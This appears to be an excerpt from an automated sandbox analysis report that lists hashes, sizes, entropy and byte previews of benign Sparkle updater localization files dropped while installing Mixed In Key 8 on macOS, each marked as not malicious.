SSDEEP:	192:ajFqvsb3Qz6Ar2hRSkLFC5OsfhMaFu6zlFwn91QZY6wp2j:aZSsoJ2OgU5Osf+WHlFw91QZY6wp2j
MD5:	CDA289488A92A308B32DD89E70E2B74C
SHA1:	E4363CEC52F14EA52A30BE310DCDA28EB2FF53F6
SHA-256:	F7FE4DAD6B1707CC3F7E4224EE037C94D5F37D5EF5CA2CB7F58EEA91068CDEBA
SHA-512:	019B886B07DE1BB6E4E693B79553860ECD235D29619BDCB46458AC841A1C551FA7189AA6FDC0713D7E304DF25E69467CF8BB733A9E6532C77859E2E0247BC5A7
Malicious:	false
Preview:	../.. .d.e._.D.E. .v.0...1. .-. .N.o. .c.o.m.m.e.n.t. .p.r.o.v.i.d.e.d. .b.y. .e.n.g.i.n.e.e.r... ../.....".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .i.n.d.i.r.i.l.d.i. .v.e. .k.u.l.l.a.n.1.m.a. .h.a.z.1.r.!. .^.i.m.d.i. .y...k.l.e.m.e.k. .i.s.t.i.y.o.r. .m.u.s.u.n.u.z.?. .U.y.g.u.l.a.m.a. .y.e.n.i.d.e.n. .b.a._.l.a.t.1.l.a.c.a.k.t.1.r...".;...../.. .d.e._.D.E. .v.0...1. .-. .N.o. .c.o.m.m.e.n.t. .p.r.o.v.i.d.e.d. .b.y. .e.n.g.i.n.e.e.r... ../.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .d.i.s.k. .i.m.a.g.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .u.y.g.u.l.a.m.a.s.1. .d.i.s.k. .k.a.l.1.b.1. .i...e.r.i.s.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_V8N68O Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15840
Entropy (8bit):	6.799193385517934
Encrypted:	false
SSDEEP:	384:+bgNfE0NeEYNg7ns2OFwyiWJtuOGDrPr0aVrIFVs4NRbl:GgNveEYyDS/iWJgOGPr0zFVs4N9l
MD5:	25AE417E6223944444A25144FF4740A1
SHA1:	4E838DF7C114D571AC9F70E0CBB1AA78D9567872
SHA-256:	39A05E6F061F508BF3302AC7D88D5FEA3A15E123BBC611ABB75286A9E4CA64BA
SHA-512:	E1496F1B4826160DCED369EBD6DB049FB6A18FA5DAC39C9CCBCD4E74E5EB5807E1F3BCB0330E7EF33BB5510B186D5C73206ECA5C693E37FDDDD53D685E3839C2
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.?.@.H.L.M.V.W.^._.c.x.\|...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....s.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_Z5D3s5 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18422
Entropy (8bit):	6.786972546950251
Encrypted:	false
SSDEEP:	384:Fcg9pE0DeEYNg7uH4+53NAKDsR6o7DQ5Pi1lflsyafSEM+Cwly:ug9DeEYyZKDd2DVlf6fS2O
MD5:	A5A18EB894DE3B274BAC0C114E00275A
SHA1:	B947C6D1EF914C575F6A2D998E5F2930FE0F1589
SHA-256:	C6ED82E890B65FFF170183DA954AEF0ED593C1F82ABA5673A2A0F6505ADC562E
SHA-512:	75EDBB08D469F88B54348A35F32EC61A74BC484332C67111378FB7447D1AD9518A7A0AD59668149BDD2A0B2E18A1F30AF956FCE1547DC7F9C6210ABD21D249A9
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...........................................x.`.........................................=.p._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObjec

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_d8BIiN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12207
Entropy (8bit):	6.711315035140136
Encrypted:	false
SSDEEP:	192:zK1WxXXQOLWjE0lTjeEYNMtKwC/4IlY3+s7sK5wNCZ/scX/cAQZPw7:zKgxXXQwWjE0NeEYNg7C/4Ils+WsfYXp
MD5:	A14A6EDDFDB7615CEA7A36AC4C97A336
SHA1:	26061B42681B077B4CCEF5F2307CE208E9889F5C
SHA-256:	551F5ADDB661B151741CD630A36BB386A91B920903E7952FE5702E3D274FBD22
SHA-512:	27EDB2AC4CCA44F005D873BAFEE06C4CB853B4BDDA1F91D904A7077807EA596476BA95AB026513A98B9B1E39E519E3AF29AFFCC960964E72F5E89B196315991F
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_7xGkHw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12261
Entropy (8bit):	6.743604346491405
Encrypted:	false
SSDEEP:	192:zK1WxXdQOLTjE0lTjeEYNMtKwC/4IMMoks7sK5wNCZ/scX/cAQZPQ/U1lQ:zKgxXdQwTjE0NeEYNg7C/4IMMokWsfYT
MD5:	0A368C803427A64574DE3A995E9B97C1
SHA1:	7FA3ABCE070182C06F3473810EF694D7DE42AEDE
SHA-256:	5D28E8A12891DC67C7BA723383756CB3DE21714E29F3CE06496D9A882519A367
SHA-512:	EFF83ECE9CA9399C5B44D91AFCB200DA8BAFD04FBE04DD199AA0E82D6FC0CE0B364D27A878194350555BE5437975C96DBE963A90F0FCE3854BC7D742A8525134
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_9UrqU3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6696
Entropy (8bit):	4.156961851830748
Encrypted:	false
SSDEEP:	96:M4+At+bNwf43IiPleiK0MAZn/um3kDMGn2HWvurFIN2KC7nGLM274:MlKf43ICleirZ3khn2HWWiH42k
MD5:	2BBB283FC0806301EDAE390A28116EB2
SHA1:	84BE78941B29ADA51DCA8D09F062DB777E6344E6
SHA-256:	64914509A698B22799B06ACE0831B96A1023C3A9695A74308CD5ED4B4ED0FA01
SHA-512:	8A7E9845EDA6702122FC087ADFE84B3DC62782F1D5E94A2A59B34A6AFB488448E47E11D054F813E865EA2D400485AAF21CDD37A9FB2A7A16CC782BCA16158AED
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.2.0.=.B.0.6.5.=.8.9. .V. .3.>.B.>.2.8.9. .4.>. .2.8.:.>.@.8.A.B.0.=.=.O.!. ...0.6.0.T.B.5. .2.A.B.0.=.>.2.8.B.8. .V. .?.5.@.5.7.0.2.0.=.B.0.6.8.B.8. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...V.4. .G.0.A. .@.>.1.>.B.8. .7. .%.1.$.@. .7. .B.>.<.C.,. .I.>. .?.@.8.7.=.0.G.5.=.8.9. .;.8.H.5. .4.;.O. .G.8.B.0.=.=.O.,. .=.0.?.@.8.:.;.0.4.,. .>.1.@.0.7.C. .4.8.A.:.0. .G.8. .>.?.B.8.G.=.>.3.>. .4.8.A.:.C.,. .9.>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_n4Qojb Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18521
Entropy (8bit):	6.8396235299837
Encrypted:	false
SSDEEP:	384:ZgupE0DeEYNg7uH4+53NAKAsif17BxpNh1lrbP8YU/8oWuSgBbgjv:ZguDeEYyZKAdR/jln4/8oBB8jv
MD5:	D9D94113814AC642C8BC65ADC5945180
SHA1:	72EDD864BE94BF5C70998E4C919C630BA2A702D7
SHA-256:	1E506BA76C40D257F50200982494E59C38E130C6023150654386E54B95F7F40F
SHA-512:	E7D6E191014438363E443EAF413BA7059E95846352F9D65474D425003C325E8335215DA182FD4224EDCAAD5B642F8034199F48AE1AB46ED4D6D354310AFB7201
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_x6cx7W Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15777
Entropy (8bit):	6.8275533906079975
Encrypted:	false
SSDEEP:	384:dgkfE0NeEYNg7ns2OF7cJtmocaGBUtOta3T9ZK:dgkveEYyDS7cJIaVAS3K
MD5:	267BD8F900950864CCCA7F2CA744BB33
SHA1:	22064BB3E45EE1B1C92B8FEEBFA021F59552A532
SHA-256:	CED05EB0C0D7D32F89D203F4CCA3777D280F02814AA6CBE259EA58E214D112E4
SHA-512:	CE5EA70855F4D5D623F56A088C4E132D9B162D96313E8DDC4A1A9DFF6A4EB2A9F24E3E9E08359441067F282AAE453B25E437149C1C98DA9310136A7E013DFA28
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_5wHsQw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15683
Entropy (8bit):	6.828224478775802
Encrypted:	false
SSDEEP:	384:yyggfE0NeEYNg7ns2OFEWJtjGDnOtNVU/FVsGT+U8QW:jggveEYyDSEWJlGyGFVsLkW
MD5:	4BF917DB00700E3B89AA3C42C33E5727
SHA1:	499E58FED8DCAC8046C10A16034DBF2202974907
SHA-256:	FAF670438FE64A197A492E8A0083B38F1D9B75A808B9C08B36B8F15CB8A82107
SHA-512:	457564A643A2D2BA77F7271C0A9FF72E1D281D37D086A93EF2D3BA5161F9373E7634E8056E9C78720AFC7639219D989C1A5330AE5B9A11738AB19F7ADF3FDA5C
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_QfjkxF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	4960
Entropy (8bit):	4.279054699252902
Encrypted:	false
SSDEEP:	96:M4st+G3Si+M5ItOc5P5i5x5e5m/1nIK765CvhclQLM27tf:Md3SXIIo9nIK6A42p
MD5:	19016389BC9F2CD2B3F0574523670938
SHA1:	C1228934896B06715C54F8C972D4B2F401E92255
SHA-256:	8C3CA2E82E512D6AE392DBCB83450FFD488F627C805DFFA63619DF812BFA475B
SHA-512:	C19362CF648FCE92384D720C44D0DDF7277A82F832E140FA35289754C3D633268EA75744B5A790D0F7FD4A0F5CE5B1E270E0B52EBEA6BE641EF160E73B962BCC
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. ..].N}..[.kv^.S.N.O(u...`.`...s(W.[. .%.1.$.@. ..T?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. ..N.....f.e..S_.[.L..N.N*N.S..'`.[wS.Y.x.v f.P.0o..vI{.Nb..e.0.y.R .%.1.$.@. .0R.^(u.z.^.e.N9Yv^.Q..N!k.0".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.b.l.e...". .=. .".%.1.$.@. .%.2.$.@. ./fS_MR.v.g.eHr,g.0".;.....".%.@. .%.@. .i.s. .n.o.w. .a.v.a.i.l.a.b.l.e.-.-.y.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_dl4IPw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18081
Entropy (8bit):	6.8597814226576945
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+53NAKAsif17Oz7nU1lflbP8YU/8oWuSgB1xHL:ZgZDeEYyZKAdR3lfZ4/8oBBXHL
MD5:	FC6625F0895C35FEBB097F44E338471C
SHA1:	DE1D3EA2EE3968D12E00A58AA23598F068C46733
SHA-256:	52C190CA3C9A9293044AF4A1B8680318BE117C9F3377C7CC0ED8029864D35674
SHA-512:	EC5503C36B21A98C6BC2F46BC1F982483E7CA911848456FA8E2C7DE49908CE8D4E29A6770A6A024F3FF0BAD8C093D8E5300598A6216017DAB221CE28BBA0FFBD
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_ynnlvT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12089
Entropy (8bit):	6.760614339122031
Encrypted:	false
SSDEEP:	192:591WlQOLHjE0lTjeEYNMtKwC/4IUX1XGga1mGWPTujN5HTEh:TglQwHjE0NeEYNg7C/4IUXe1mGxjN5Hg
MD5:	04BA5493C37FC55E70FA160925069B62
SHA1:	773F3E4AEF8ADE9D6472C19BE50BE9577C7E16B9
SHA-256:	16E4BBAF5119C65E49466488A366AE252CC3BDB593215ECC4A8D56580E69483C
SHA-512:	F4C6452D5408E61953EAC6DD2B156F7EB615E3031F6E3621E2BCC20EF044F1B09A3E956816B89B2027A7E2938896408712FEEEB21B5D7B91C60E484E623A6042
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$....2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{................................................................................................... .!.(.)..1.2.3.H.K.L.N.c...f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........~.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...g.j.l.n.u.x.{....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....e.f....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_7cGD3r Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15326
Entropy (8bit):	6.828340045990188
Encrypted:	false
SSDEEP:	384:RkgPpE0DeEYNg7uH4+BC3MJtDyvkp+dDQVvONVrTNFiq:RkgPDeEYy0C3MJJ4dDQqruq
MD5:	592AA89A22DA5CE0B4FC4DECDBCF1F1D
SHA1:	E591FED0506282EC05530A680C138C8B21999B2F
SHA-256:	FE7044ADBF9F8C6D3B6CE3F21CD06A676E90A782F9A100544F5F0F9EA472CE63
SHA-512:	74351C50A42CD3AB3F15495969BB51E33A0982BEE512B07FFF9F4C4DBC0CDD2AFB686829BD2886B7D55FAE87094B4DE286530B24A4E78FCAD3EDCF8E0F38BC59
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.\|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys................. ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_V5jtA9 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12044
Entropy (8bit):	6.762394893179439
Encrypted:	false
SSDEEP:	192:zK1WxXwQOL+jE0lTjeEYNMtKwC/4IvrQDWes7sK5wNCZ/scX/cAQZPq766/:zKgxXwQw+jE0NeEYNg7C/4IvrQDWeWsk
MD5:	2203439210C3102A534730244CD458E3
SHA1:	1B51681B93D602638F4657D0A0762BDCF06CD50C
SHA-256:	96F3682C0FE739CD06AE9E311DC113247DABB9DE599C8FA64309215411509CAF
SHA-512:	199AD1289ADFCD37F5BF9776B432C1CF825D6CF13C26A746C254A738E58E83DE940EF0950F9720F1BDCBF7266840B74B6F3848F7CFC8B4619E6722B6D14A6574
Malicious:	false
